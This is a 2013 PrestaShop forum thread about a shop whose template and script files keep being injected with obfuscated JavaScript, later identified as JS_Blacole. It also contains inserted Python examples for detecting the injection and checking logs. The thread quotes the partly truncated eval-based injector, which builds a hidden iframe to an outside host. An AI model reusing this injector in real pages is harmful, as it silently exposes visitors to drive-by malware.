sgnappo Posted June 2, 2013

Hi to all, yesterday my web site with PrestaShop 1.5.3.1 returned only a blank page. I activated the displaying of errors and saw that the following error was returned:

```
Fatal error: Uncaught exception 'SmartyCompilerException' with message 'Syntax Error in template "/var/www/clients/client1/web1/web/modules/blockcurrencies/blockcurrencies.tpl" on line 62 "</div><!--0c0896--><script type="text/javascript" language="javascript" > ps="split";asd=function(){d.body++};a=("44,152,171,162,147,170,155,163,162,44,176,176,176,152,152,152,54,55,44,177,21,16,44,172,145,166,44,155,147,153,160,44,101,44,150,163,147,171,161,151,162,170,62,147,166,151,145,170,151,111,160,151,161,151,162,170,54,53,155,152,166,145,161,151,53,55,77,21,16,21,16,44,155,147,153,160,62,167,166,147,44,101,44,53,154,170,170,164,76,63,63,173,173,173,62,152,171,152,155,157,151,166,170,62,154,171,63,147,163,171,162,170,151,166,62,164, in /var/www/clients/client1/web1/web/tools/smarty/sysplugins/smarty_internal_templatecompilerbase.php on line 627
```

I accessed the files through FTP and saw that the file blockcurrencies.tpl had been modified on the same day, and inside there was the following code:

```
<!--0c0896-->
<script type="text/javascript" language="javascript">
ps="split";asd=function(){d.body++};a=("44,152,171,162,147,170,155,163,162,44,176,176,176,152,152,152,54,55,44,...."[ps](","));ss=String;d=document;for(i=0;i<a.length;i+=1){a[i]=-(7-3)+parseInt(a[i],8);}try{asd()}catch(q){zz=0;}try{zz/=2}catch(q){zz=1;}if(!zz)if(window["document"])eval(ss.fromCharCode.apply(ss,a));
</script>
<!--/0c0896-->
```

I deleted that code but the error was returned on another page. All index.php, .tpl and .js files were modified with that malicious code. In a couple of hours I cleaned all files... but today I have the same problem again, with all files modified and the web site off. How can I prevent this issue? My files have 644 permissions but this is not enough.

Please help me to secure the site.

Many thanks
Regards
Salvatore
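An added example, not part of the original thread: a scanner that finds every file carrying the tagged block shown in the post above and lists it with its modification time, so the cleanup does not depend on opening files one by one. The function names, the extension list and the sample tree are assumptions made for this example; the marker pattern generalizes the `0c0896` tag to any six-hex-digit tag.

```python
import os
import re

# Paired hex-tag comments around the injected script, as in the post:
# <!--0c0896--> ... <!--/0c0896-->. Generalized to any six-hex-digit tag.
INJECT_RE = re.compile(rb"<!--([0-9a-f]{6})-->.*?<!--/\1-->", re.DOTALL)
SCAN_EXT = (".php", ".tpl", ".js", ".html")  # assumed set of file types to check


def scan_tree(root):
    """Return [(path, tag, mtime)] for files holding an injected block, oldest first."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(SCAN_EXT):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    data = fh.read()
            except OSError:
                continue  # unreadable file: skip it, keep scanning
            match = INJECT_RE.search(data)
            if match:
                hits.append((path, match.group(1).decode(), os.path.getmtime(path)))
    return sorted(hits, key=lambda hit: hit[2])


def strip_injection(data):
    """Remove every tagged block from a file's bytes; other content is untouched."""
    return INJECT_RE.sub(b"", data)


def build_sample(root):
    """Write a constructed two-file tree: one infected template, one clean script."""
    infected = b'</div><!--0c0896--><script>/* payload elided */</script><!--/0c0896-->\n'
    with open(os.path.join(root, "blockcurrencies.tpl"), "wb") as fh:
        fh.write(b"<div>{$currency}" + infected)
    with open(os.path.join(root, "index.php"), "wb") as fh:
        fh.write(b"<?php require 'config.php'; // <!--note--> not a tag pair\n")


if __name__ == "__main__":
    import tempfile
    with tempfile.TemporaryDirectory() as tmp:
        build_sample(tmp)
        for path, tag, mtime in scan_tree(tmp):
            print(f"{mtime:.0f}  tag={tag}  {path}")
```

The modification times it reports are the ones to compare against the server logs; stripping the block cleans the files but does not close whatever wrote it, which is why the files in this thread were modified again.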
vekia Posted June 2, 2013

This problem may be related to... other web pages (if you've got any) on the same hosting package. So, have you got any? WordPress? Joomla? If not, maybe the problem is related to... your computer. When you connect to the FTP, all files on it will be infected. Another idea: maybe you use some non-default and non-safe addons?
Bill Dalton Posted June 2, 2013

The first thing you need to do is change your FTP and phpMyAdmin password.
sgnappo Posted June 3, 2013

Hi Vekia / Bill Dalton, thanks for the reply. On my server (a dedicated host on a cloud platform) there is only one web site with PrestaShop. There are only PrestaShop addons. I don't think my PC is the problem. No virus/malware was found by the antivirus, and after I cleaned all files the site was running for one day and then the same problem again. There have been two modifications in the last 12 hours. Yesterday at 22.00 and today at 06.00 all files have been modified again. Could there be a script hosted on the server which runs automatically? How to find it?

PS: The Back-end is running.

Many thanks for replies.
Regards
Salvatore

Edited June 3, 2013 by sgnappo
vekia Posted June 3, 2013

If you've got the date on which the files have been changed, check cron jobs. If you've also got the Apache log, check connections to your website related to the date on which the files have been infected.
sgnappo Posted June 3, 2013

The log files contain a lot of bot accesses. These accesses are suspect:

```
173.199.116.195 AhrefsBot/4.0; +http://ahrefs.com/robot
77.88.26.27 YandexImages/3.0; +http://yandex.com/bots
184.170.134.30 Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729
```

There are no cron jobs. Now I am downloading all files in order to check if there is an external script inside. Do you have other suggestions?

Thanks and regards
Salvatore
vekia Posted June 3, 2013

In the logs, did you check the time related to the date of the file changes? Any connections related to the PHP scripts?
sgnappo Posted June 3, 2013

Yes, I checked lines close to the time of change (6.03am).

```
--------ACCESS LOG-------
77.88.26.27 - - [03/Jun/2013:05:56:55 +0200] "GET /robots.txt HTTP/1.1" 200 2334 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
77.88.26.27 - - [03/Jun/2013:05:56:57 +0200] "GET /18851-home_default/toner-originale-canon-fx-4.jpg HTTP/1.1" 304 0 "-" "Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)"
66.249.72.25 - - [03/Jun/2013:06:00:38 +0200] "GET /toner-rigenerati/818-toner-rigenerato-brother-dr-300.html HTTP/1.1" 503 659 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.25 - - [03/Jun/2013:06:02:37 +0200] "GET /toner-rigenerati/818-toner-rigenerato-brother-dr-300.html HTTP/1.1" 503 659 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
173.199.116.195 - - [03/Jun/2013:06:03:16 +0200] "GET /271-cartucce-compatibili-stampanti-brother-intellifax-2300ml HTTP/1.1" 503 666 "-" "Mozilla/5.0 (compatible; AhrefsBot/4.0; +http://ahrefs.com/robot/)"
66.249.72.25 - - [03/Jun/2013:06:03:26 +0200] "GET /60-cartucce-compatibili-stampanti-brother-dcp-185c HTTP/1.1" 503 660 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
65.36.241.76 - - [03/Jun/2013:06:04:15 +0200] "GET / HTTP/1.1" 503 1233 "-" "InternetSeer.com"
-------------------
```

No connections related to PHP scripts :-(
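The check discussed in the posts above (look at the access log around the time the files changed, for connections to PHP scripts), written out as an added example that is not part of the original thread. It keeps only requests in a window before the modification time that use a method other than GET/HEAD or hit a `.php` script directly; the function name, the 15-minute window and the sample log lines are assumptions made for this example.

```python
import re
from datetime import datetime, timedelta, timezone

# Apache combined log format, the format of the access log quoted in the thread.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+'
)


def requests_before_change(lines, modified_at, window_minutes=15):
    """Requests in the window before a file's mtime that could have run
    server-side code: any non-GET/HEAD method, or a direct hit on a .php script."""
    start = modified_at - timedelta(minutes=window_minutes)
    flagged = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        if not start <= ts <= modified_at:
            continue
        script = m["path"].split("?", 1)[0].lower()
        if m["method"] not in ("GET", "HEAD") or script.endswith(".php"):
            flagged.append((ts.strftime("%H:%M:%S"), m["ip"], m["method"], m["path"]))
    return flagged


# Constructed sample lines (documentation IPs, hypothetical paths), not from the thread.
SAMPLE_LOG = [
    '192.0.2.10 - - [03/Jun/2013:05:40:02 +0200] "POST /modules/example/send.php HTTP/1.1" 200 12 "-" "-"',
    '192.0.2.10 - - [03/Jun/2013:05:58:41 +0200] "POST /modules/example/send.php HTTP/1.1" 200 12 "-" "-"',
    '192.0.2.77 - - [03/Jun/2013:06:00:38 +0200] "GET /toner.html HTTP/1.1" 503 659 "-" "ExampleBot"',
    '192.0.2.20 - - [03/Jun/2013:06:01:10 +0200] "GET /index.php?id_product=3 HTTP/1.1" 200 900 "-" "-"',
]
# File modification time reported in the thread: 3 June 2013, 06:03 (+0200).
CHANGE_TIME = datetime(2013, 6, 3, 6, 3, tzinfo=timezone(timedelta(hours=2)))

if __name__ == "__main__":
    for row in requests_before_change(SAMPLE_LOG, CHANGE_TIME):
        print(*row)
```

Run over the seven lines quoted in the post above, the filter returns nothing, since every request there is a GET for a non-PHP URL.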
vekia Posted June 3, 2013

So everything looks fine :/ No cron jobs, no connections to PHP scripts...

Here is a nice thread about a similar issue: http://stackoverflow.com/questions/16264707/opencart-ajax-json-response-unknown-characters

I think that one page from your hoster (not a page on your hosting account) is infected.
sgnappo Posted June 3, 2013

I have read the thread and it is very similar to my issue. However, I have just uploaded a clean version of PS and the site is running. I am waiting for new changes :-). I hope none.

Thanks
Salvatore
vekia Posted June 3, 2013

Don't forget to let us know if everything works fine.
sgnappo Posted June 4, 2013

Yes, until now everything is fine. However, the name of the virus is "JS_Blacole_SMTT". I have downloaded the whole site to my PC and my antivirus has detected it and removed the code from all files. I will keep you updated.

Regards
Salvatore
vekia Posted June 4, 2013

I'm googling for it, no results :|
sgnappo Posted June 4, 2013

Here it is: http://about-threats.trendmicro.com/Malware.aspx?id=57883&name=JS_BLACOLE.SMTT&language=en